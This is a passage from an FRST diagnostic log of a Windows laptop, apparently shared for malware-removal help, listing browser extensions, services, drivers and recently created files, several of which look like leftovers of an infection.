CHR Extension: (drumbit) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mplpmdejoamenolpcojgegminhcnmibo [2016-02-03]
CHR Extension: (WeatherBug) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2015-10-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-15]
CHR Extension: (Picasa) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\onlgmecjpnejhfeofkgbfgnmdlipdejb [2015-08-15]
CHR Extension: (Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-15]
CHR Extension: (Inbox by Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkclgpgponpjmpfokoepglboejdobkpl [2015-11-12]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 a2AntiMalware; C:\Program Files\Emsisoft Anti-Malware\a2service.exe [11332672 2016-03-24] (Emsisoft Ltd)
S4 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe [69016 2016-02-05] (Google Inc.)
S4 CLDTVHNService; C:\Program Files (x86)\DirecTV\DirecTV\Kernel\DMP\CLDTVHNService.exe [75048 2009-09-17] ()
S4 ETDService; C:\Program Files\Elantech\ETDService.exe [144104 2015-10-31] (ELAN Microelectronics Corp.)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1253376 2009-08-27] (MAGIX AG) [File not signed]
S4 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [3276800 2008-08-07] (MAGIX®) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Micro Star SCM; C:\Program Files (x86)\System Control Manager\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S4 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
S4 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 pgsql-8.3; C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe [65536 2008-09-19] (PostgreSQL Global Development Group) [File not signed]
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] ()
S4 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [745224 2015-07-08] (DEVGURU Co., LTD.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5436176 2015-02-09] (TeamViewer GmbH)
R2 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [50336 2015-09-15] (Thrustmaster®)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
S4 kBTNrls; "C:\ProgramData\QsKNKvQ\kBTNrls.exe" [X]
S4 Muibguaw; "C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn\Tugboxh.exe" -cms [X]
S4 Nijgatfy; "C:\Users\RoNiN\AppData\Roaming\Kalekuhrin\Kalekuhrin.exe" -cms [X]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWOW64\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 ArcSoftKsUFilter; C:\Windows\System32\DRIVERS\ArcSoftKsUFilter.sys [19968 2009-05-26] (ArcSoft, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [165376 2015-07-09] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [36864 2015-07-09] (Microsoft Corporation)
R1 epp; C:\PROGRAM FILES\EMSISOFT ANTI-MALWARE\epp.sys [124080 2016-02-11] (Emsisoft Ltd)
S3 EUCR; C:\Windows\System32\drivers\EUCR6SK.SYS [87888 2009-12-04] (ENE Technology Inc.)
R1 mbamchameleon; C:\WINDOWS\system32\drivers\mbamchameleon.sys [109272 2015-10-05] (Malwarebytes)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-04-08] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation)
S3 MFE_RR; C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [24120 2016-04-07] (McAfee, Inc.)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 NTIOLib_1_0_4; C:\Program Files (x86)\msi\Live Update 5\NTIOLib_X64.sys [14136 2010-10-22] (MSI)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek                                            )
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2011-02-14] (Duplex Secure Ltd.)
S3 tmbulk; C:\Windows\System32\Drivers\tmbulk.sys [133280 2015-06-30] (© Guillemot R&D, 2015. All rights reserved.)
S3 tmhidusb; C:\Windows\system32\DRIVERS\tmhidusb.sys [170144 2015-09-15] (Thrustmaster)
S3 tmResetMin; C:\Windows\System32\Drivers\tmResetMin.sys [36000 2015-09-15] (© Guillemot R&D, 2013. All rights reserved.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-08 10:20 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\system32\gpedit.msc
2016-04-08 10:18 - 2016-04-08 10:18 - 00016148 _____ C:\WINDOWS\system32\RONIN-LAPTOP_RoNiN_HistoryPrediction.bin
2016-04-08 09:56 - 2016-04-08 09:56 - 00707354 _____ C:\WINDOWS\unins000.exe
2016-04-08 09:56 - 2016-04-08 09:56 - 00001535 _____ C:\WINDOWS\unins000.dat
2016-04-08 09:56 - 2016-04-08 09:56 - 00000000 ____D C:\WINDOWS\SysWOW64\GPBAK
2016-04-08 09:56 - 2008-04-14 02:11 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appmgr.dll
2016-04-08 09:56 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\SysWOW64\gpedit.msc
2016-04-07 20:55 - 2016-04-08 10:28 - 00000000 ____D C:\FRST
2016-04-07 18:06 - 2016-04-07 18:08 - 00271216 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_18.06.48_log.txt
2016-04-07 16:15 - 2016-04-07 17:52 - 00000000 ____D C:\AdwCleaner
2016-04-07 15:48 - 2016-04-07 15:48 - 00000490 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.48.47_log.txt
2016-04-07 15:05 - 2016-04-07 15:08 - 00270622 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
2016-04-07 14:51 - 2016-04-07 14:51 - 00000947 _____ C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
2016-04-07 14:51 - 2016-04-07 14:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2016-04-05 13:10 - 2016-04-08 13:34 - 00000000 ____D C:\virus
2016-03-29 18:40 - 2016-03-29 18:40 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (10).ica
2016-03-29 18:29 - 2016-03-29 18:29 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (9).ica
2016-03-29 18:21 - 2016-03-29 18:21 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (8).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001380 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (5).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (7).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (6).ica
2016-03-29 18:12 - 2016-03-29 18:19 - 59554128 _____ (Citrix Systems, Inc.) C:\Users\RoNiN\Downloads\CitrixReceiver4.2.100 (1).exe
2016-03-29 18:11 - 2016-03-29 18:22 - 00734784 _____ (Oracle Corporation) C:\Users\RoNiN\Downloads\JavaSetup8u77.exe
2016-03-29 18:10 - 2016-03-29 18:10 - 02072960 _____ (Pulse Secure, LLC) C:\Users\RoNiN\Downloads\JuniperSetupClientInstaller.exe
2016-03-24 00:01 - 2016-03-24 00:01 - 04622232 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool (1).exe
2016-03-23 23:06 - 2016-03-29 18:45 - 00002282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-23 23:06 - 2016-03-29 18:45 - 00002270 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-03-23 23:04 - 2016-03-23 23:05 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup (1).exe
2016-03-23 23:02 - 2016-03-23 23:02 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\My Documents
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Videos
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Pictures
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Music
2016-03-23 23:01 - 2016-03-23 23:02 - 00000000 ____D C:\Users\DefaultAppPool
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Real
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Media Center Programs
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\NVIDIA Corporation
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\NVIDIA
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\Google
2016-03-23 22:36 - 2016-03-23 22:45 - 04584344 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool.exe
2016-03-23 22:26 - 2016-03-23 22:26 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup.exe
2016-03-23 11:41 - 2016-03-23 11:41 - 00001054 _____ C:\Users\RoNiN\Desktop\mwbytescan2016-03-23.txt
2016-03-23 07:41 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\is-BFNHB.tmp
2016-03-22 23:30 - 2016-03-22 23:30 - 00000000 ____D C:\ProgramData\Emsisoft
2016-03-22 21:58 - 2016-04-08 10:27 - 00000000 ____D C:\Program Files\Emsisoft Anti-Malware
2016-03-22 21:12 - 2016-03-23 11:46 - 225721384 ____N (Emsisoft Ltd. ) C:\Users\RoNiN\Desktop\EmsisoftAntiMalwareSetup.exe
2016-03-22 21:04 - 2016-03-22 21:04 - 00000020 ___SH C:\Users\postgres\ntuser.ini
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\My Documents
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Videos
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Pictures
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Music
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Real
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Media Center Programs
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA Corporation
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\Google
2016-03-22 21:01 - 2016-04-05 12:43 - 00000000 ____D C:\Users\postgres
2016-03-22 20:37 - 2016-03-22 20:37 - 00671442 _____ C:\Users\RoNiN\Desktop\mwbytescan2016-03-22.txt
2016-03-22 18:54 - 2016-03-22 18:54 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-22 08:01 - 2016-04-08 09:49 - 00003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-03-21 23:37 - 2016-03-29 12:30 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2016-03-21 23:03 - 2016-03-21 23:03 - 00001066 _____ C:\malwarebytes scan 2016-03-21.txt
2016-03-21 19:35 - 2016-03-21 19:35 - 00000046 _____ C:\Users\RoNiN\AppData\Roaming\WB.CFG
2016-03-21 19:12 - 2016-03-21 10:23 - 00886256 _____ (Microsoft Corporation) C:\Users\RoNiN\Desktop\mssstool64.exe
2016-03-14 21:33 - 2016-03-14 21:33 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Chromium
2016-03-14 18:48 - 2016-03-14 18:48 - 00000000 ____D C:\WINDOWS\system32\del
2016-03-13 21:32 - 2016-03-13 21:32 - 00000188 _____ C:\WINDOWS\rst30.bat
2016-03-13 19:52 - 2016-03-13 19:52 - 00000000 ____D C:\WINDOWS\system32\nod
2016-03-13 19:48 - 2016-03-13 19:48 - 00000000 ____D C:\WINDOWS\system32\aro
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\c
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\ProgramData\1457912307
2016-03-13 19:36 - 2016-03-13 19:36 - 00023554 _____ C:\WINDOWS\System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F}
2016-03-13 19:29 - 2016-03-13 19:38 - 00000000 ___HD C:\ProgramData\wrc
2016-03-13 19:26 - 2016-03-13 19:26 - 00631808 _____ C:\WINDOWS\wrc.dat
2016-03-13 19:24 - 2016-03-13 19:47 - 06000640 _____ C:\Program Files (x86)\GUTD8C6.tmp
2016-03-13 19:24 - 2016-03-13 19:24 - 00000000 ____D C:\Program Files (x86)\GUMD7DA.tmp
2016-03-13 19:23 - 2016-03-21 20:44 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Setup Wizard
2016-03-13 18:52 - 2016-03-13 18:52 - 00003052 _____ C:\WINDOWS\System32\Tasks\Pritc
2016-03-13 18:51 - 2016-03-13 18:51 - 00000229 _____ C:\WINDOWS\DXM.REG
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\keja
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\byeq
2016-03-13 15:11 - 2016-03-13 15:11 - 00003418 _____ C:\WINDOWS\System32\Tasks\Rocfokt
2016-03-13 14:35 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Vilvuk
2016-03-13 14:35 - 2016-03-22 23:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MirhMevf
2016-03-13 14:32 - 2016-04-08 09:48 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-13 14:29 - 2016-03-23 07:41 - 00001181 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-13 14:29 - 2016-03-23 07:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-13 14:29 - 2016-03-23 07:41 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-13 14:29 - 2016-03-13 14:29 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-13 14:29 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-13 14:29 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-13 14:29 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-13 14:15 - 2016-03-13 14:27 - 22908888 _____ (Malwarebytes ) C:\Users\RoNiN\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-13 14:04 - 2016-03-13 14:04 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MCorp
2016-03-11 19:39 - 2016-03-11 19:39 - 07600640 _____ C:\Users\RoNiN\AppData\Roaming\agent.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 01786944 _____ C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-11 19:39 - 2016-03-11 19:39 - 00018432 _____ C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:38 - 2016-03-11 19:38 - 00072729 _____ C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2016-03-11 19:36 - 2016-03-22 01:44 - 00000000 ____D C:\Users\RoNiN\AppData\Local\app
2016-03-11 19:33 - 2016-03-25 15:00 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Company
2016-03-11 19:33 - 2016-03-11 19:33 - 00003416 _____ C:\WINDOWS\System32\Tasks\Lhsorj
2016-03-11 19:32 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
2016-03-11 19:32 - 2016-03-13 14:35 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Tempfolder
2016-03-11 19:32 - 2016-03-11 19:32 - 00127488 _____ C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:32 - 2016-03-11 19:32 - 00000000 ____D C:\uninst
2016-03-11 19:27 - 2016-03-23 16:05 - 00000000 ____D C:\ProgramData\DataFile
2016-03-11 19:27 - 2016-03-11 19:27 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-03-11 19:25 - 2016-04-08 09:47 - 00000368 ____H C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job
2016-03-11 19:25 - 2016-04-08 09:47 - 00000356 _____ C:\WINDOWS\Tasks\BJZJKCUBLH1.job
2016-03-11 19:25 - 2016-03-11 19:25 - 00003444 _____ C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC
2016-03-11 19:25 - 2016-03-11 19:25 - 00002928 _____ C:\WINDOWS\System32\Tasks\BJZJKCUBLH1
2016-03-11 19:24 - 2016-03-11 19:24 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-03-11 19:18 - 2016-03-11 19:16 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-03-10 23:17 - 2016-03-10 23:17 - 00000000 ____D C:\Users\RoNiN\AppData\Local\CEF
2016-03-10 14:32 - 2016-03-10 23:19 - 00000000 ____D C:\Users\RoNiN\Downloads\DMBDMB
2016-03-09 18:06 - 2016-03-09 18:46 - 00000000 ____D C:\Users\RoNiN\Downloads\Bj The Chicago Kid - In My Mind
2016-03-09 18:04 - 2016-03-09 18:04 - 00000000 ____D C:\Program Files (x86)\basicData
2016-03-09 18:03 - 2016-03-09 18:03 - 00002560 _____ C:\Users\RoNiN\AppData\Local\uninstall.exe
2016-03-09 17:42 - 2016-03-09 17:42 - 00781238 _____ C:\Users\RoNiN\Downloads\Setup.zip
2016-03-09 17:37 - 2016-03-09 17:45 - 150662627 _____ C:\Users\RoNiN\Downloads\Bj The Chicago Kid - In My Mind.zip
2016-03-09 10:31 - 2016-02-23 08:16 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-09 10:31 - 2016-02-23 07:55 - 24592896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-09 10:31 - 2016-02-23 07:45 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-09 10:31 - 2016-02-23 06:55 - 19326464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-09 10:31 - 2016-02-23 06:48 - 21859840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-09 10:31 - 2016-02-23 06:38 - 07524864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-03-09 10:31 - 2016-02-23 06:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-09 10:31 - 2016-02-23 06:00 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-03-09 10:31 - 2016-02-23 05:58 - 18800640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-09 10:30 - 2016-02-23 10:53 - 01314496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-03-09 10:30 - 2016-02-23 10:52 - 00858408 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-09 10:30 - 2016-02-23 10:51 - 00633184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-03-09 10:30 - 2016-02-23 10:51 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-09 10:30 - 2016-02-23 10:50 - 00630160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-09 10:30 - 2016-02-23 10:48 - 08022368 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-09 10:30 - 2016-02-23 10:48 - 01294352 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-09 10:30 - 2016-02-23 10:48 - 01123952 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-09 10:30 - 2016-02-23 10:41 - 01150816 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-09 10:30 - 2016-02-23 10:41 - 00299600 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL
2016-03-09 10:30 - 2016-02-23 10:41 - 00078040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkscli.dll
2016-03-09 10:30 - 2016-02-23 10:40 - 00110584 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvcli.dll
2016-03-09 10:30 - 2016-02-23 10:38 - 00272752 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-09 10:30 - 2016-02-23 10:36 - 00080128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netapi32.dll
2016-03-09 10:30 - 2016-02-23 10:11 - 00781984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-03-09 10:30 - 2016-02-23 10:11 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-09 10:30 - 2016-02-23 10:11 - 00103776 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-03-09 10:30 - 2016-02-23 10:08 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-09 10:30 - 2016-02-23 10:07 - 22322624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-09 10:30 - 2016-02-23 09:39 - 00607416 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-03-09 10:30 - 2016-02-23 09:30 - 01643872 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-09 10:30 - 2016-02-23 09:25 - 01085632 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-03-09 10:30 - 2016-02-23 09:23 - 00952968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-03-09 10:30 - 2016-02-23 09:21 - 00529456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-09 10:30 - 2016-02-23 09:21 - 00141152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-09 10:30 - 2016-02-23 09:11 - 00249976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL
2016-03-09 10:30 - 2016-02-23 09:11 - 00073360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srvcli.dll
2016-03-09 10:30 - 2016-02-23 09:11 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wkscli.dll
2016-03-09 10:30 - 2016-02-23 09:09 - 00229352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-09 10:30 - 2016-02-23 09:06 - 00069232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netapi32.dll
2016-03-09 10:30 - 2016-02-23 08:58 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-03-09 10:30 - 2016-02-23 08:50 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-09 10:30 - 2016-02-23 08:50 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-03-09 10:30 - 2016-02-23 08:42 - 00658536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-03-09 10:30 - 2016-02-23 08:42 - 00467296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
